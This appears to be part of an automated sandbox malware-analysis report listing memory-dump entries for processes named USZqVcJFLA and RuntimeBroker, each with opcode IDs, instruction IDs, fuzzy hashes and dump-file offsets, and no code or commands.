• Opcode Fuzzy Hash: 1edc4761797611264eeab4d1ba4062ee44ae74d7292f0b60230b0243f57ddea9
• Instruction Fuzzy Hash: A711D030A0891C8FDB9CDF08D455BD977A1FB98305F1541ADD10ED32A1CB359A81CF85
Memory Dump Source
• Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 90e9d4110260026b09f7da8f73965c696d837fcbc00d51ec0f458a0608ba2e57
• Instruction ID: 0dfafb9ea2edbdafc7234a8c41eace4f355738a82454d96a9dda48f1d48b82a3
• Opcode Fuzzy Hash: 90e9d4110260026b09f7da8f73965c696d837fcbc00d51ec0f458a0608ba2e57
• Instruction Fuzzy Hash: EF01B135B0D64D9FEB11FBA8C8515EDBFB0EF45310F1542B6C095C7292EA34A7458781
Memory Dump Source
• Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a6331d68b147272261e1c36d11094e21d963d704d54e65d2a188005978bf2d41
• Instruction ID: c7728a21b53e30653a5009cf19e91794869b855e77bd471391d266249a69145a
• Opcode Fuzzy Hash: a6331d68b147272261e1c36d11094e21d963d704d54e65d2a188005978bf2d41
• Instruction Fuzzy Hash: 98018B31F0E28DAFEB11EBA8C8505EDBFB0EF46314F1542B6D085C7292EA34A7458781
Memory Dump Source
• Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c268983a4882225e9959e4965f9c1aee6ab1e6a502efb7629e290a927035df6e
• Instruction ID: 2f139612b40f9e2e15ce04da7bd204bb86ca286c81c75bd6b797ac38f8adf98e
• Opcode Fuzzy Hash: c268983a4882225e9959e4965f9c1aee6ab1e6a502efb7629e290a927035df6e
• Instruction Fuzzy Hash: 08F0C23194F2899FD7128BB088624E93FF4AF47210B1A40E6E046C60A2C53C164A8361
Memory Dump Source
• Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb995c0b9e9c7e2c90e5124ddb080bbb9da54e6eebe6602551435dde938be0e3
• Instruction ID: aaf972dd9bbf7d101efb0a04e69d3ba5f42545b0a1cbeeb1c5fd3b14c7f21449
• Opcode Fuzzy Hash: bb995c0b9e9c7e2c90e5124ddb080bbb9da54e6eebe6602551435dde938be0e3
• Instruction Fuzzy Hash: B5F08C30E0E28DAFEB11EBA4C8545EDBFB0EF46304F1542A6D045C7292EA74A7848780
Memory Dump Source
• Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5fde619f9fcd4920e43b643fc7e4bd765983da383d76b1d0257111f72bc91cc
• Instruction ID: 03ee11706003fea0a1c8a001fc69e0ba1aa202db9a36c56e0a6ef2a719d9427c
• Opcode Fuzzy Hash: d5fde619f9fcd4920e43b643fc7e4bd765983da383d76b1d0257111f72bc91cc
• Instruction Fuzzy Hash: FD01CD70A1895DDFDB58EF58C8A1AACB7B1FB68301F1401A9D00ED32E1DB746D81DB40
Memory Dump Source
• Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa5ac4db39697fdb09116284c6ad6c6f976d15449e7afd67723c5ea92ee0e97a
• Instruction ID: e1a056a0fc8450a651e77164b1e2585aaae9a331ed95e912ba00e4414e6dd3a1
• Opcode Fuzzy Hash: fa5ac4db39697fdb09116284c6ad6c6f976d15449e7afd67723c5ea92ee0e97a
• Instruction Fuzzy Hash: EFF0F611A0E7CA4FDB325BF08C654A83F90DF1335071A05F6C0588F0F7D56429068751
Memory Dump Source
• Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
• Instruction ID: 4541fce71d7268346ab946a5ca2a4d2f1040646d4da02423522929b8f9abee86
• Opcode Fuzzy Hash: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
• Instruction Fuzzy Hash: 7FE01224F1E11E4BFFB4F794C4657BC66519F98300F124074D40EE32E1DE286E418744
Memory Dump Source
• Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a9fba13757a84dc399704c631768f83c74f782b10b547eccc999cc3699ae83b4
• Instruction ID: c6a4d57548ce41f8feb589004f946eeda496d3e1a609e8e5df6f6b6727566680
• Opcode Fuzzy Hash: a9fba13757a84dc399704c631768f83c74f782b10b547eccc999cc3699ae83b4
• Instruction Fuzzy Hash: B4C08030511C0C4FC70CE734C458C6473D0FB192017C10094D00EC7170D959DD94C741
Memory Dump Source
• Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
• Instruction ID: dd528de23fe39d29e397bb87cc43918efda9675f8775ee5b947c3cdbab3474a6
• Opcode Fuzzy Hash: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
• Instruction Fuzzy Hash: 45C08C01F6F40F90ED3033ED14660BCB9409FCCA20FD30032C00CC00E4AC0E23850582
Memory Dump Source
• Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                      • Opcode ID: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction ID: e26fc5b4efa652df2bbfa4f0433417b3accce0671069ce48a98bf16b584644a1
                                                                                      • Opcode Fuzzy Hash: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction Fuzzy Hash: 34C08C3051180C8FC908EB2AC88480437A0FB0D204BC20090E009C7270D219DCC1C740
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8178988d89ec8674ba43568580c5592b5c80e2f8b7cee0afb0af2fea3e1606b6
                                                                                      • Instruction ID: ef8d013f8dd1ab693ec9f08633e0e8f0dafe3aae9fc743e6a62af07ec0ef43ce
                                                                                      • Opcode Fuzzy Hash: 8178988d89ec8674ba43568580c5592b5c80e2f8b7cee0afb0af2fea3e1606b6
                                                                                      • Instruction Fuzzy Hash: ECD09260B1ED1B85F23847E5813823E59929F04300FA2847ED05F898F5C9387B46E601
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction ID: 5db00b8b68f3ed98146b0da3957a3cc38e73788dde41762f27e75208c3694f60
                                                                                      • Opcode Fuzzy Hash: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction Fuzzy Hash: 6FC00285F0E25B15FEB167D556652B80A444F29365F0A4179D58D865E2DD0C6A010229
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction ID: 847c847f9cace75ae8bcb2df13b6db3745f01fec73c6f3779f37ff5bca68f02d
                                                                                      • Opcode Fuzzy Hash: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction Fuzzy Hash: 5AB01200D9B40F00DD3433F508560A478005B8C100FC20170D409800E5DC4D12940242
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8195716ec12102436166c874ff99a9ac0157c14793f7303e5de14f1f667a76d7
                                                                                      • Instruction ID: 64e3faedded6b615ff164ab5c0658fd90eb22728fbde89f2975bbfb500c23bf8
                                                                                      • Opcode Fuzzy Hash: 8195716ec12102436166c874ff99a9ac0157c14793f7303e5de14f1f667a76d7
                                                                                      • Instruction Fuzzy Hash: 8BB01210E0C01D5DE7609B54881037C94A0EF2C300F1100F2C02DE31C3EB281D004600
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction ID: 993146e6ab8ea8262cdffa6db9040e4c2607ca78daf5a237243687c05f46532b
                                                                                      • Opcode Fuzzy Hash: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2046a70e38853a20d77f36698816b00ea51871248067eeb6913b6728851fbb00
                                                                                      • Instruction ID: 450be33e82dbb7d9f72379e52ef755735a7fc0dcd1b1e2b47cf66c5efe92f631
                                                                                      • Opcode Fuzzy Hash: 2046a70e38853a20d77f36698816b00ea51871248067eeb6913b6728851fbb00
                                                                                      • Instruction Fuzzy Hash: B891D271A19A8D8FE788EB68C8697E87BE1FF55301F4401BAD049C76E6DBBC64058740
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 564f4423bb34da6f2c71a19c4cc0d95b9fd2b8f55da1d00d2e7409bac4534587
                                                                                      • Instruction ID: 6aa88c535c39f9f393c4a70182a70fe5711e36f0a3d54dfeae81c347cd0240d2
                                                                                      • Opcode Fuzzy Hash: 564f4423bb34da6f2c71a19c4cc0d95b9fd2b8f55da1d00d2e7409bac4534587
                                                                                      • Instruction Fuzzy Hash: F4712511B2EA4E4EE768667808A52B976C2DF89B55F66023DD0CFC32E7ED1C69034245
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c462211b8e8d387a38b44ec7089fe62f0920bf091a86f7dbb092cd6bcbb9abda
                                                                                      • Instruction ID: e7b964c0e5ba19d650b928df5c568c3308f501bd4a0f3cfffcb13dce890eee8d
                                                                                      • Opcode Fuzzy Hash: c462211b8e8d387a38b44ec7089fe62f0920bf091a86f7dbb092cd6bcbb9abda
                                                                                      • Instruction Fuzzy Hash: D3514B32F1DA5C8FD764EB7C88A46AA77E1FF4D311B05017AE09AC72A7DE2498018741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1dbffcbb5ef153721b08439b3af4a5fd0362fdce0eac83922e54c15f73a55f3
                                                                                      • Instruction ID: c1b9ee478b7a1f8619bd1fbb7fc8e07f8b20bdad4e71612f85445b4b03c2e1ec
                                                                                      • Opcode Fuzzy Hash: c1dbffcbb5ef153721b08439b3af4a5fd0362fdce0eac83922e54c15f73a55f3
                                                                                      • Instruction Fuzzy Hash: D0319C37B1D6994FD721B77CA8A50EA3FE0EF89239B04017BD1C9CA093DD2494478695
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb0d9fec88df3fb5f1f94967296982c73d501746ad457dae859856b2f5cf8090
                                                                                      • Instruction ID: ffa0d82a3cdca0da0f1b5cb141b98c30c3153ab37ed52f0dd6b78150b7b93b16
                                                                                      • Opcode Fuzzy Hash: fb0d9fec88df3fb5f1f94967296982c73d501746ad457dae859856b2f5cf8090
                                                                                      • Instruction Fuzzy Hash: 9E317C32B5E7984FD721B77C58A90FA3FE0EF89239B05017BE0C9CA193ED2490468795
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 891621908b84e31796a686e1f006ca5838beed2ff7a8dbe50125984065d31de5
                                                                                      • Instruction ID: e655901ad161095aad127547c9c6a708b4ed84ae77df893718cd64af545ef117
                                                                                      • Opcode Fuzzy Hash: 891621908b84e31796a686e1f006ca5838beed2ff7a8dbe50125984065d31de5
                                                                                      • Instruction Fuzzy Hash: 87314C21F5CA1D4FE758B77C686AAF973C2DF89365B4440BAE40EC32E7DC58AC414285
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f496a09f6fe4225c1a191d4a54ece360f3c48032e2fa0a7f9ac7e9c85a1a647
                                                                                      • Instruction ID: 8eec9622caad60d1919ea7d2716cac8079cc33d0248defca5919db4bbb9aa285
                                                                                      • Opcode Fuzzy Hash: 3f496a09f6fe4225c1a191d4a54ece360f3c48032e2fa0a7f9ac7e9c85a1a647
                                                                                      • Instruction Fuzzy Hash: F1218C32A5D7984FE721B77C58A50FA3FE0EF49239F04017BE0DACA193ED2490468795
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c295e915c50a883a42be59db7c6093a3c7cbfc5eded2c6874d2871c3ea9bb1f
                                                                                      • Instruction ID: 8cdb118e2832de922f5c00c1eb1df737bf3c87fbd285668d1b2532cc654dae7a
                                                                                      • Opcode Fuzzy Hash: 7c295e915c50a883a42be59db7c6093a3c7cbfc5eded2c6874d2871c3ea9bb1f
                                                                                      • Instruction Fuzzy Hash: C2213A20B18E5D4FE788FB6C586EA7972C2DB9D315F4400B9E40EC32E7DD189C418281
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab3f5658f336cf2876d0484d31e302a203a4619631e04c5d9d580799b4be4d9e
                                                                                      • Instruction ID: 710f879cf470863e2fe3373d3c648274f5c5bfe1f5f982dca46931edff01f151
                                                                                      • Opcode Fuzzy Hash: ab3f5658f336cf2876d0484d31e302a203a4619631e04c5d9d580799b4be4d9e
                                                                                      • Instruction Fuzzy Hash: 67210335B0964ECFE710FBA8C8696ECBBB0EF94311F5541B6C154C7193EA34A689CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 670109c2ed75a270fa84168a99d12e64013a92adf950f11aa8a82e606cf027bc
                                                                                      • Instruction ID: 013515f410faf167bed28fd54e10c83c6a48c526ddee5f9a5c308b2eeef2b676
                                                                                      • Opcode Fuzzy Hash: 670109c2ed75a270fa84168a99d12e64013a92adf950f11aa8a82e606cf027bc
                                                                                      • Instruction Fuzzy Hash: E301C435B0964D8FDB01FBB8C4545DCBBB0EF85315F1546B6C094C7292E63497598780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0bc184d7401e7241976788b71161a689f2e20b6a369857e7caa72c5ca68f6dee
                                                                                      • Instruction ID: 4372fbf44cec6690e59da48e878581c548c101766828a009ae6df3bfefe0729b
                                                                                      • Opcode Fuzzy Hash: 0bc184d7401e7241976788b71161a689f2e20b6a369857e7caa72c5ca68f6dee
                                                                                      • Instruction Fuzzy Hash: A011E230A0891C8FDB98DF08C855BD973E2FB58305F1541ADD10ED76A1DB359A85CF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e28db8a1fabba3cf7e10a160f82d37380007dcc35aef180307726fc3dfa470d
                                                                                      • Instruction ID: 1e250afb4eab1c105841deed50e901737ff9664ba347b6b7ce40993ca5c61d73
                                                                                      • Opcode Fuzzy Hash: 3e28db8a1fabba3cf7e10a160f82d37380007dcc35aef180307726fc3dfa470d
                                                                                      • Instruction Fuzzy Hash: 2A01B135B0964D8FEB11FBA8C4545DDBBB0EF45315F1546B6C094CB292EA34A7898780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32c83054273fd199ff01052b192e5de36f1abed5e17595054cd0c24b2e35722a
                                                                                      • Instruction ID: c6de60a4e95c125b0e183863d231682cf2dd9b1df6ddbad731bf655da774b381
                                                                                      • Opcode Fuzzy Hash: 32c83054273fd199ff01052b192e5de36f1abed5e17595054cd0c24b2e35722a
                                                                                      • Instruction Fuzzy Hash: 6F01FD34B0A28DCFDB11EBA8C8545ECBBB0EF45314F1442B6C084CB292EA34A7898780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7e314e10f930c3b5dc0fb2e018ba5586fe63dc0086372106d058a67ceaf7fb3
                                                                                      • Instruction ID: be1ea1d1036997202cac62bff5981f53b852319f046db152caf4e4a5b01da16e
                                                                                      • Opcode Fuzzy Hash: e7e314e10f930c3b5dc0fb2e018ba5586fe63dc0086372106d058a67ceaf7fb3
                                                                                      • Instruction Fuzzy Hash: 7EF08C34E0A28DDEEB11EBA4C5545EDBBB1EF05314F5452A6D045C7292EA74A7848780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d6de258a3e3bd4d6eb3c18cc8f61e800c9c0fd198b3bbba04686d85d6de6e8a2
                                                                                      • Instruction ID: 49cdcbda651ef79b7c6cf8876bf8a5bb46665751b86deaa9a202af0ec74d1c45
                                                                                      • Opcode Fuzzy Hash: d6de258a3e3bd4d6eb3c18cc8f61e800c9c0fd198b3bbba04686d85d6de6e8a2
                                                                                      • Instruction Fuzzy Hash: 1AE02020B1CA594FD715A65C88B55B87391DF2C700F1000F2D41DE31D7DD647E4147C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction ID: a7111a5cf8304330d4f1f898cfd59eab36aa374f85973b720c19934f6be825ba
                                                                                      • Opcode Fuzzy Hash: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction Fuzzy Hash: 33E01220F1A11E8FFBB4F794C4657BC62519F98300F9250B4D40EE32E6DD286E419744
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction ID: e2efb28efd2030582f2b94126146dd60df4dd52828dd202dd99ac55589ebcb75
                                                                                      • Opcode Fuzzy Hash: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction Fuzzy Hash: ACC08C00F6B80FC8E53833E914A70ACA2409BCCA10FD31032C00C800B9AC4E23851686
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction ID: 731851d84390f0c41736b8267269be39596ad08ca66d1d30114b9de1a637f4cc
                                                                                      • Opcode Fuzzy Hash: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction Fuzzy Hash: 15C08C30511C0C8FC908EB2AC88580433A0FB4D208BC20090E009C7270D219DCC1C740
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction ID: 7c33ec76a012ae929e59e9da952bb4dd4332c5a9e21af060aeebf87ee10d9bec
                                                                                      • Opcode Fuzzy Hash: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction Fuzzy Hash: 63C01280F0E10B8DFBA0239112293BC02404F29361F8A10B9D58D821E39C0C6A011229
